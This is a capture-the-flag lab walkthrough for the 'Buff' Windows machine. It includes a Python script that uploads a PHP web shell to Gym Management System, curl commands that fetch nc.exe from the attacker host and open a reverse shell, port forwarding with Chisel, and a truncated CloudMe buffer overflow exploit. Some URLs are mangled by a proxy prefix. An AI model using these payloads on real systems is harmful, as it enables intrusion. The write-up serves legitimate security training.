Buff
Buff
Buff
16th Oct 2020 / Document No D20.100.95
Difficulty: Easy
Classification: Official
Synopsis
Buff is an easy difficulty Windows machine that features an instance of Gym Management System
1.0. This is found to suffer from an unauthenticated remote code execution vulnerability.
Enumeration of the internal network reveals a service running at port 8888. The installation file
for this service can be found on disk, allowing us to debug it locally. We can perform port
forwarding in order to make the service available and exploit it.
Skills Required
Basic Networking
Enumeration
Skills Learned
Unauthenticated RCE
Buffer Overflow
Port Forwarding
Enumeration
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.198 | grep ^[0-9] | cut -d '/' -f1
| tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p $ports 10.10.10.198 -Pn
The Nmap scan reveals port 8080, which is running Apache server with PHP version 7.4.6.
Visiting /contact reveals information about the version of the web application.
Foothold
We know that the web application is running Gym Management Software 1.0. Searching for
known issues for this application reveals an unauthenticated file upload vulnerability, which
allows attackers to gain RCE.
We can download Gym Management Software from here. Let's take a look at source code to
understand how it works.
unzip Gym-Management-System-Project-in-PHP-master.zip
Accord to public analysis on this application, the vulnerability exists in upload.php because the
application doesn't check if the user is authenticated.
<?php
<SNIP>
$user = $_GET['id'];
$allowedExts = array("jpg", "jpeg", "gif", "png","JPG");
$extension = @end(explode(".", $_FILES["file"]["name"]));
if(isset($_POST['pupload'])){
if ((($_FILES["file"]["type"] == "image/png")
<SNIP>
move_uploaded_file($_FILES["file"]["tmp_name"],
"upload/". $user.".".$ext);
$url=$user.".".$ext;
<SNIP>
?>
Looking at the source code of upload.php , we see that it takes in the GET parameter id and
assigns the value to a variable user. It also checks if the image file is valid, but we can bypass
those filters by adding a double extension. Lets create a simple Python script to upload our
malicious php code.
#!/usr/bin/env python3
import requests
def Main():
url = "http://10.10.10.198:8080/upload.php?id=test"
s = requests.Session()
s.get(url, verify=False)
PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a'
png = {
'file':
(
'test.php.png',
PNG_magicBytes+'\n'+'<?php echo shell_exec($_GET["cmd"]); ?>',
'image/png',
{'Content-Disposition': 'form-data'}
)
}
data = {'pupload': 'upload'}
r = s.post(url=url, files=png, data=data, verify=False)
print("Uploaded!")
if __name__ == "__main__":
Main()
We are satisfying the check that this is a valid PNG file by prepending it with the magic bytes for
PNG, which are 0x8950 in hex.
The PHP code in in our webshell will execute any command we provide in a GET request using
the "cmd" parameter.
This succeeded. Let's upgrade to a proper shell. First, upload a Netcat binary, then stand up a
simple Python HTTP server and a Netcat listener locally on port 4444.
python3 -m http.server 80
nc -lvnp 4444
Finally, issue the commands below to download nc.exe and execute it to spawn a reverse shell.
curl "http://10.10.10.198:8080/upload/test.php?cmd=powershell%20Invoke-
WebRequest%20-Uri%20https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2F10.10.14.2%2Fnc.exe%20-
Outfile%20c%3A%5Cusers%5Cpublic%5Cnc.exe"
curl "http://10.10.10.198:8080/upload/test.php?
cmd=c%3A%5Cusers%5Cpublic%5Cnc.exe%2010.10.14.2%204444%20-e%20cmd.exe"
We've successfully received a more stable reverse shell.
Lateral Movement
On enumerating the file system, we come across the binary CloudMe_1112.exe in the directory
C:\Users\shaun\Downloads .
After downloading and running the installer in a VM, we see that the service is listening on port
8888. Using netstat , we confirm that port 8888 is available on the box, bound to localhost.
Privilege Escalation
Searching online for "Cloud Me" version 1112 returns this Exploit-DB exploit. Inspection reveals
that it's a buffer overflow exploit (see Appendix A for the code listing).
As the service listens on localhost, we can make this port available to our machine using a SOCKS
proxy. To accomplish this, we can use Chisel. First, set up the Chisel server on our attacking
machine, listening on port 9999.
We can download Chisel for Windows and upload it to the target machine so we can tunnel port
8080 to our system.
We confirm that the tunnel was successfully established. Let's use msfvenom to generate
shellcode.
python2 run.py
This is successful and we receive a shell as administrator and can access the root flag on the
desktop.
Appendix A
CloudMe Exploit Code:
import socket
import sys
target = "127.0.0.1"
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)